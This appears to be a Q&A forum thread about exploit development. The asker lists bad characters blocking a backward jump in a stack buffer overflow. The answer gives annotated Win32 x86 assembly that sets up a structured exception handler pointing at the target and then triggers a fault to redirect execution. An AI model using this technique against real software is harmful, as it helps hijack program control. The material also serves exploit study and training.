reverse move in stack without jmp

Question

Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call register. Ex. FFD6 call esi Would anyone be able to give me some pointers or an example in assembly of how to get a resulting FFD6?

I'm messing around with an exploit, and having a hard time moving backwards in the stack due to bad characters. I need to move back ~460 bytes to get to the start of my buffer.

Here is a list of the bad characters:

\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff

I'm limited to x86\alpha_mixed with a couple exceptions like x81 & x8d. The only way I've been able to move back in the stack is \x74\x81 (which are allowed characters), but I'd have to do that 4 times to get back the ~460. That wouldn't be the biggest deal, except that will also make it very difficult for me to segment my shellcode when I'm already having to encode it to alpha_mixed.

I'm not an assembly master, so is there any other way that I'm missing that I might be able to move directly back without jmp or call (FF)?

Answer 1

I have a working solution, but it's for Windows only and is based on a few other assumptions.

It's not totally optimized, I guess there are better ways to do parts of this...

; ASSUMPTIONS:
;   Platform is Win32
;   ESI contains address to be jumped to
;   All characters except for 00 and the ones you listed above are allowed
;   The contents of the registers after the jump don't matter
; BASIC METHOD:
;   1) Set up a structured exception handler pointing to your target address
;   2) Cause an exception

; Get zero into EAX and EDX
00401000      B8 11111111   MOV EAX, 11111111
00401005      35 11111111   XOR EAX, 11111111
0040100A      50            PUSH EAX
0040100B      5A            POP EDX

; First part of the SEH: Push target address
0040100C      56            PUSH ESI

; Second part of the SEH: Read FS:[0] and push it
0040100D      64:0310       ADD EDX, FS:[EAX]
00401010      52            PUSH EDX

; Get zero into EDX again
00401011      50            PUSH EAX
00401012      5A            POP EDX

; Write new SEH pointer into FS:[0]
00401013      64:2110       AND FS:[EAX], EDX
00401016      64:0120       ADD FS:[EAX], ESP

; Trigger exception (writing to memory at address zero)
00401019      0110          ADD [EAX], EDX